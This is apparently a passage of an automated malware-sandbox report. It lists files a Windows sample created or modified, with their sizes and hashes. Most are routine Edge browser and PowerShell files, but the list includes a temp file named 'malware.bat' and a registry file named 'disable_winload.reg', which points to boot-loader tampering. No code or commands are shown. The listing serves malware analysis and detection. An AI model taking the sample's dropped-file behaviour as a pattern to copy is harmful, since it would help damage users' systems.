SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5612a6c4247ef652299b376221c984213
SHA1d306f3b16bde39708aa862aee372345feb559750
SHA2569d8e24c91cff338e56b518a533cb2e49a2803356bbf6e04892fb168a7ce2844a
SHA51234a14d63abb1e3fe0f9927a94393043d458fe0624843e108d290266f554018e6379cba924cb5388735abdd6c5f1e2e318478a673f3f9b762815a758866d10973
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD556641592f6e69f5f5fb06f2319384490
SHA16a86be42e2c6d26b7830ad9f4e2627995fd91069
SHA25602d4984e590e947265474d592e64edde840fdca7eb881eebde3e220a1d883455
SHA512c75e689b2bbbe07ebf72baf75c56f19c39f45d5593cf47535eb722f95002b3ee418027047c0ee8d63800f499038db5e2c24aff9705d830c7b6eaa290d9adc868
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD544a9e5bc99eae7d104760cbd47ca8ef6
SHA125a50a8081c1c7cba6275057b988a47a7e050767
SHA256668e376ad599377178c739cc05d98ecbfda02d2610552bcbcd541a9e4bed014d
SHA512308b4091e2816f0f45acc4bacfe38029d3023b0e4b26fa94dbaff79fe96acec783b6ecec6e773e9cb091a4a1d2117d8f8dd90b813062587362783e9e27f14b0c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD503ae9bb6c219caa53a9da30c0942e6c1
SHA1d7a5f009ffa9b3f365d0635d9a0b6f6e6b984d4b
SHA256b80f3b660d2e4a70d927756eb8e35ed098edea56a3451ebaa452da09e003a70b
SHA51278b0538a503d6daa3a6e924e5f531f45900032ae49c265f23ec3409dcae2a4a6c243e5b1b14ae4bacc08db016e43e53a69aa68146258d9ba81c8005c3dd5ce61
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD568542f16ae77fdf530e0ea6fb8b28c61
SHA199b6d73c86d0503654cbce7299412729e60dbd33
SHA25604bb53681d8fc59fd452723fd623dd948e760ccdae1f65d72a3e9ecfd5878043
SHA512d257d4dc520cd60c95c85cb2ca67047e2b1cfb661b34c8bff165cfdeb7567ddd0380a5ee21ab42c30baad18a3526e591e42d7810b2d66696eafec105264368cc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD59b0d0d79d0bbef03f6d943f6a8af8378
SHA1e3fb64a682ff88397cbc3f4a48057b5c638fad5d
SHA2569191424a02c75865d3c4af64b98ad85ededa47d09182101031cdcbe2fea69843
SHA512aae89565e6b6ac9508bfa08b1fda7ac6bc763737eeaa5d13a74e96791d8e75139991c5696ff94e784cf410b2536aa4f98791612d73461f01675dda8c18f2db0f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD56757b360beeb307e0fba49d6e600536c
SHA1394c0bb999075a60f4f016411b318a0d8b4c697c
SHA256c0ecaa9619175a753a17566228d83af27deec6ba63b4d878ec2308c6138aef19
SHA512091892e71257a3bfc94da16e7119921a136f1c9efa1031bff4bd273519d8dfec3ee76c79ed0eb81b7a6a90ad1fe66bd9201510c97a7cbdaedd88d18335bc8c68
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2f55tg2t.qdv.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\disable_winload.regFilesize
91B
MD547b5ae368c4aff20eafa90ffdcd03a34
SHA1dff7d41c3d4a68e9e633b671b4a4c7fcb40c8f81
SHA256aaf7fcebf2aa8e1ebd7bff75c05ab14951a6c7f7a37e9db0a15403cb491b3e07
SHA512c4b8ad90b868aefea7b95701b1d4a5d6239d0fe452fad25df4fe6c8928c529d99225930d3fe2941b10bd6b07eef05aff9fd443a836638fc4916372d2588c136f
-
C:\Users\Admin\AppData\Local\Temp\malware.batFilesize
7KB
MD5e7fffbf1e3fe60a678f8124b61dd75d2
SHA1f2296600d68912d6e6460669e2c9109d5193c71c
SHA25611b79791eb44fbdcd4e8be16dd966cafe1511ce70485d26f4fd0f87fbad0a326
SHA5123835271d92716cf4be33b50cb1e4496ca3f4268a6c0614130da5f0e05a2f96b4803bf36a1bb61ba4f4a11a0a34cbb9c316c91d9adb93e33062ad370cc64e58a9
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.dbFilesize
1024KB
MD53f9ef71f47262bdc5860a7ec807267f5
SHA12e34096661899ef1a1ff24709ac0d4d46654d6eb
SHA25672371f11f867bab70b1c4667b5d13c74ec619f62cc7125d21501c96a9269b473
SHA512fefce0071811ffa25e4d41513d446e7c2bdb0d1d1f8c11afcf01fc22d5dbb7e6f4c510e0bd9d8b9327389610fb1c041e7ea9acc3938cf9f38b54083b3eaa7ef8
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.dbFilesize
7KB
MD5175e99711986f1ded690b3be3798ac2a
SHA12d1a183e78bf0c7ce6b0e3422ae353225ed4f550
SHA2567c921f9179864c1aa7452a116349adc035720a3d499ec00492e0c8b3d938709c
SHA5126b22a5ddc73bfacdfd5a7e8a24b394e43ce278b429d27424a6fc7f42cbe7b1ebb3db3d146630ad45451fdb6063303d156f39fae2dec9a89a945d2c50a7106eeb
-
\??\pipe\LOCAL\crashpad_4128_RKJFAYEECGTBODNTMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/4984-0-0x000001B1225D0000-0x000001B1225F2000-memory.dmpFilesize
136KB
-
memory/5008-37-0x000001A7688A0000-0x000001A7688BE000-memory.dmpFilesize
120KB
-
memory/5008-34-0x000001A7688A0000-0x000001A7688BE000-memory.dmpFilesize
120KB